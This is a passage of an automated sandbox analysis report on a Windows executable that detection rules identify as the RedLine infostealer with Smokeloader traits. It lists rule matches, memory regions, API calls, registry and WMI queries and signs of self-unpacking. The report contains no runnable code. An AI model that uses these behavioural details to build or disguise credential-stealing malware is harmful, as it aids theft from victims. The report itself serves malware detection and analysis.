                  Source: 0.3.Igv6ymbAA3.exe.2450000.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                  Source: 0.2.Igv6ymbAA3.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                  Source: 0.2.Igv6ymbAA3.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MAL_Malware_Imphash_Mar23_1 date = 2023-03-20, author = Arnim Rupp, description = Detects malware by known bad imphash or rich_pe_header_hash, score = 167dde6bd578cbfcc587d5853e7fc2904cda10e737ca74b31df52ba24db6e7bc, reference = https://yaraify.abuse.ch/statistics/, license = Detection Rule License 1.1 https://github.com/SigmaHQ/Detection-Rule-License, modified = 2023-03-22, hash = 866e3ea86671a62b677214f07890ddf7e8153bec56455ad083c800e6ab51be37
                  Source: 0.2.Igv6ymbAA3.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                  Source: 0.2.Igv6ymbAA3.exe.262f71e.2.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                  Source: 0.3.Igv6ymbAA3.exe.9ee370.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                  Source: 0.2.Igv6ymbAA3.exe.2700ee8.5.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                  Source: 0.2.Igv6ymbAA3.exe.2700000.4.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                  Source: 0.2.Igv6ymbAA3.exe.262f71e.2.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                  Source: 0.2.Igv6ymbAA3.exe.2850000.6.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                  Source: 0.2.Igv6ymbAA3.exe.262e836.3.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                  Source: 0.2.Igv6ymbAA3.exe.2700ee8.5.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                  Source: 0.2.Igv6ymbAA3.exe.2410e67.1.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Malware_Imphash_Mar23_1 date = 2023-03-20, author = Arnim Rupp, description = Detects malware by known bad imphash or rich_pe_header_hash, score = 167dde6bd578cbfcc587d5853e7fc2904cda10e737ca74b31df52ba24db6e7bc, reference = https://yaraify.abuse.ch/statistics/, license = Detection Rule License 1.1 https://github.com/SigmaHQ/Detection-Rule-License, modified = 2023-03-22, hash = 866e3ea86671a62b677214f07890ddf7e8153bec56455ad083c800e6ab51be37
                  Source: 0.2.Igv6ymbAA3.exe.2410e67.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                  Source: 0.2.Igv6ymbAA3.exe.262e836.3.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                  Source: 0.2.Igv6ymbAA3.exe.2850000.6.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                  Source: 0.2.Igv6ymbAA3.exe.2700000.4.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                  Source: 0.3.Igv6ymbAA3.exe.9ee370.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                  Source: 00000000.00000002.400990974.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                  Source: 00000000.00000002.402241386.0000000002850000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                  Source: 00000000.00000003.350331599.0000000002450000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: MAL_Malware_Imphash_Mar23_1 date = 2023-03-20, author = Arnim Rupp, description = Detects malware by known bad imphash or rich_pe_header_hash, score = 167dde6bd578cbfcc587d5853e7fc2904cda10e737ca74b31df52ba24db6e7bc, reference = https://yaraify.abuse.ch/statistics/, license = Detection Rule License 1.1 https://github.com/SigmaHQ/Detection-Rule-License, modified = 2023-03-22, hash = 866e3ea86671a62b677214f07890ddf7e8153bec56455ad083c800e6ab51be37
                  Source: 00000000.00000003.350331599.0000000002450000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                  Source: 00000000.00000002.402147783.0000000002700000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                  Source: 00000000.00000002.401518261.0000000002410000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                  Source: 00000000.00000002.401246578.0000000000989000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                  Source: C:\Users\user\Desktop\Igv6ymbAA3.exeCode function: 0_2_00408C600_2_00408C60
                  Source: C:\Users\user\Desktop\Igv6ymbAA3.exeCode function: 0_2_0040DC110_2_0040DC11
                  Source: C:\Users\user\Desktop\Igv6ymbAA3.exeCode function: 0_2_00407C3F0_2_00407C3F
                  Source: C:\Users\user\Desktop\Igv6ymbAA3.exeCode function: 0_2_00418CCC0_2_00418CCC
                  Source: C:\Users\user\Desktop\Igv6ymbAA3.exeCode function: 0_2_00406CA00_2_00406CA0
                  Source: C:\Users\user\Desktop\Igv6ymbAA3.exeCode function: 0_2_004028B00_2_004028B0
                  Source: C:\Users\user\Desktop\Igv6ymbAA3.exeCode function: 0_2_0041A4BE0_2_0041A4BE
                  Source: C:\Users\user\Desktop\Igv6ymbAA3.exeCode function: 0_2_004182440_2_00418244
                  Source: C:\Users\user\Desktop\Igv6ymbAA3.exeCode function: 0_2_004016500_2_00401650
                  Source: C:\Users\user\Desktop\Igv6ymbAA3.exeCode function: 0_2_00402F200_2_00402F20
                  Source: C:\Users\user\Desktop\Igv6ymbAA3.exeCode function: 0_2_004193C40_2_004193C4
                  Source: C:\Users\user\Desktop\Igv6ymbAA3.exeCode function: 0_2_004187880_2_00418788
                  Source: C:\Users\user\Desktop\Igv6ymbAA3.exeCode function: 0_2_00402F890_2_00402F89
                  Source: C:\Users\user\Desktop\Igv6ymbAA3.exeCode function: 0_2_00402B900_2_00402B90
                  Source: C:\Users\user\Desktop\Igv6ymbAA3.exeCode function: 0_2_004073A00_2_004073A0
                  Source: C:\Users\user\Desktop\Igv6ymbAA3.exeCode function: 0_2_02412B170_2_02412B17
                  Source: C:\Users\user\Desktop\Igv6ymbAA3.exeCode function: 0_2_0241786D0_2_0241786D
                  Source: C:\Users\user\Desktop\Igv6ymbAA3.exeCode function: 0_2_024118B70_2_024118B7
                  Source: C:\Users\user\Desktop\Igv6ymbAA3.exeCode function: 0_2_024289EF0_2_024289EF
                  Source: C:\Users\user\Desktop\Igv6ymbAA3.exeCode function: 0_2_024131F00_2_024131F0
                  Source: C:\Users\user\Desktop\Igv6ymbAA3.exeCode function: 0_2_024131870_2_02413187
                  Source: C:\Users\user\Desktop\Igv6ymbAA3.exeCode function: 0_2_0241DE780_2_0241DE78
                  Source: C:\Users\user\Desktop\Igv6ymbAA3.exeCode function: 0_2_02418EC70_2_02418EC7
                  Source: C:\Users\user\Desktop\Igv6ymbAA3.exeCode function: 0_2_02417EA60_2_02417EA6
                  Source: C:\Users\user\Desktop\Igv6ymbAA3.exeCode function: 0_2_02416F070_2_02416F07
                  Source: C:\Users\user\Desktop\Igv6ymbAA3.exeCode function: 0_2_0242A7250_2_0242A725
                  Source: C:\Users\user\Desktop\Igv6ymbAA3.exeCode function: 0_2_02428F330_2_02428F33
                  Source: C:\Users\user\Desktop\Igv6ymbAA3.exeCode function: 0_2_024177D90_2_024177D9
                  Source: C:\Users\user\Desktop\Igv6ymbAA3.exeCode function: 0_2_024284AB0_2_024284AB
                  Source: C:\Users\user\Desktop\Igv6ymbAA3.exeCode function: 0_2_02412DF70_2_02412DF7
                  Source: C:\Users\user\Desktop\Igv6ymbAA3.exeCode function: String function: 0040E1D8 appears 44 times
                  Source: C:\Users\user\Desktop\Igv6ymbAA3.exeCode function: String function: 0241E43F appears 44 times
                  Source: Igv6ymbAA3.exe, 00000000.00000002.402241386.0000000002850000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameGuardant.exe4 vs Igv6ymbAA3.exe
                  Source: Igv6ymbAA3.exe, 00000000.00000003.350331599.000000000247B000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameGuardant.exe4 vs Igv6ymbAA3.exe
                  Source: Igv6ymbAA3.exe, 00000000.00000002.401518261.000000000243C000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameGuardant.exe4 vs Igv6ymbAA3.exe
                  Source: Igv6ymbAA3.exe, 00000000.00000002.401980636.0000000002657000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameGuardant.exe4 vs Igv6ymbAA3.exe
                  Source: Igv6ymbAA3.exe, 00000000.00000002.401980636.0000000002657000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_.dll4 vs Igv6ymbAA3.exe
                  Source: Igv6ymbAA3.exe, 00000000.00000002.402147783.0000000002700000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameGuardant.exe4 vs Igv6ymbAA3.exe
                  Source: Igv6ymbAA3.exe, 00000000.00000002.402147783.0000000002700000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilename_.dll4 vs Igv6ymbAA3.exe
                  Source: Igv6ymbAA3.exe, 00000000.00000002.403988658.0000000003953000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameGuardant.exe4 vs Igv6ymbAA3.exe
                  Source: Igv6ymbAA3.exe, 00000000.00000003.350614100.00000000009EE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameGuardant.exe4 vs Igv6ymbAA3.exe
                  Source: Igv6ymbAA3.exe, 00000000.00000003.350614100.00000000009EE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_.dll4 vs Igv6ymbAA3.exe
                  Source: Igv6ymbAA3.exe, 00000000.00000002.400990974.000000000043D000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameGuardant.exe4 vs Igv6ymbAA3.exe
                  Source: Igv6ymbAA3.exe, 00000000.00000002.402656262.00000000029B5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename vs Igv6ymbAA3.exe
                  Source: Igv6ymbAA3.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: Igv6ymbAA3.exeVirustotal: Detection: 40%
                  Source: Igv6ymbAA3.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: C:\Users\user\Desktop\Igv6ymbAA3.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                  Source: C:\Users\user\Desktop\Igv6ymbAA3.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32Jump to behavior
                  Source: C:\Users\user\Desktop\Igv6ymbAA3.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                  Source: C:\Users\user\Desktop\Igv6ymbAA3.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId=&apos;1&apos;
                  Source: C:\Users\user\Desktop\Igv6ymbAA3.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId=&apos;1&apos;
                  Source: C:\Users\user\Desktop\Igv6ymbAA3.exeFile created: C:\Users\user\AppData\Local\SystemCacheJump to behavior
                  Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@1/1@0/1
                  Source: C:\Users\user\Desktop\Igv6ymbAA3.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
                  Source: C:\Users\user\Desktop\Igv6ymbAA3.exeCode function: 0_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,FindCloseChangeNotification,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear,0_2_004019F0
                  Source: C:\Users\user\Desktop\Igv6ymbAA3.exeCode function: 0_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,FindCloseChangeNotification,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear,0_2_004019F0
                  Source: C:\Users\user\Desktop\Igv6ymbAA3.exeCommand line argument: 08A0_2_00413780
                  Source: C:\Users\user\Desktop\Igv6ymbAA3.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                  Source: C:\Users\user\Desktop\Igv6ymbAA3.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior
                  Source: Igv6ymbAA3.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                  Source: Igv6ymbAA3.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                  Source: Igv6ymbAA3.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                  Source: Igv6ymbAA3.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                  Source: Igv6ymbAA3.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                  Source: Igv6ymbAA3.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                  Source: Igv6ymbAA3.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                  Source: Binary string: R"C:\putomeru\rivigonahehu\nafuzul.pdb source: Igv6ymbAA3.exe
                  Source: Binary string: _.pdb source: Igv6ymbAA3.exe, 00000000.00000002.401980636.0000000002657000.00000004.00000020.00020000.00000000.sdmp, Igv6ymbAA3.exe, 00000000.00000002.402147783.0000000002700000.00000004.08000000.00040000.00000000.sdmp, Igv6ymbAA3.exe, 00000000.00000003.350614100.00000000009EE000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: C:\putomeru\rivigonahehu\nafuzul.pdb source: Igv6ymbAA3.exe

                  Data Obfuscation

                  barindex
                  Detected unpacking (overwrites its own PE header)
                  Source: C:\Users\user\Desktop\Igv6ymbAA3.exeUnpacked PE file: 0.2.Igv6ymbAA3.exe.400000.0.unpack
                  Detected unpacking (changes PE section rights)
                  Source: C:\Users\user\Desktop\Igv6ymbAA3.exeUnpacked PE file: 0.2.Igv6ymbAA3.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;
                  Source: C:\Users\user\Desktop\Igv6ymbAA3.exeCode function: 0_2_0041C40C push cs; iretd 0_2_0041C4E2
                  Source: C:\Users\user\Desktop\Igv6ymbAA3.exeCode function: 0_2_00423149 push eax; ret 0_2_00423179
                  Source: C:\Users\user\Desktop\Igv6ymbAA3.exeCode function: 0_2_0041C50E push cs; iretd 0_2_0041C4E2
                  Source: C:\Users\user\Desktop\Igv6ymbAA3.exeCode function: 0_2_004231C8 push eax; ret 0_2_00423179
                  Source: C:\Users\user\Desktop\Igv6ymbAA3.exeCode function: 0_2_0040E21D push ecx; ret 0_2_0040E230
                  Source: C:\Users\user\Desktop\Igv6ymbAA3.exeCode function: 0_2_0041C6BE push ebx; ret 0_2_0041C6BF
                  Source: C:\Users\user\Desktop\Igv6ymbAA3.exeCode function: 0_2_0242C125 push ebx; ret 0_2_0242C126
                  Source: C:\Users\user\Desktop\Igv6ymbAA3.exeCode function: 0_2_0242BE73 push cs; iretd 0_2_0242BF49
                  Source: C:\Users\user\Desktop\Igv6ymbAA3.exeCode function: 0_2_0242BF75 push cs; iretd 0_2_0242BF49
                  Source: C:\Users\user\Desktop\Igv6ymbAA3.exeCode function: 0_2_0241E484 push ecx; ret 0_2_0241E497
                  Source: C:\Users\user\Desktop\Igv6ymbAA3.exeCode function: 0_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,FindCloseChangeNotification,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear,0_2_004019F0
                  Source: initial sampleStatic PE information: section name: .text entropy: 7.755781377893314
                  Source: C:\Users\user\Desktop\Igv6ymbAA3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Igv6ymbAA3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Igv6ymbAA3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Igv6ymbAA3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Igv6ymbAA3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Igv6ymbAA3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Igv6ymbAA3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Igv6ymbAA3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Igv6ymbAA3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Igv6ymbAA3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Igv6ymbAA3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Igv6ymbAA3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Igv6ymbAA3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Igv6ymbAA3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Igv6ymbAA3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Igv6ymbAA3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Igv6ymbAA3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Igv6ymbAA3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Igv6ymbAA3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Igv6ymbAA3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Igv6ymbAA3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Igv6ymbAA3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Igv6ymbAA3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Igv6ymbAA3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Igv6ymbAA3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Igv6ymbAA3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Igv6ymbAA3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Igv6ymbAA3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Igv6ymbAA3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Igv6ymbAA3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Igv6ymbAA3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Igv6ymbAA3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Igv6ymbAA3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Igv6ymbAA3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Igv6ymbAA3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Igv6ymbAA3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Igv6ymbAA3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Igv6ymbAA3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Igv6ymbAA3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Igv6ymbAA3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Igv6ymbAA3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Igv6ymbAA3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Igv6ymbAA3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Igv6ymbAA3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Igv6ymbAA3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Igv6ymbAA3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Igv6ymbAA3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Igv6ymbAA3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Igv6ymbAA3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Igv6ymbAA3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Igv6ymbAA3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Igv6ymbAA3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Igv6ymbAA3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Igv6ymbAA3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Igv6ymbAA3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Igv6ymbAA3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Igv6ymbAA3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Igv6ymbAA3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Igv6ymbAA3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Igv6ymbAA3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Igv6ymbAA3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Igv6ymbAA3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Igv6ymbAA3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Igv6ymbAA3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                  Malware Analysis System Evasion

                  barindex
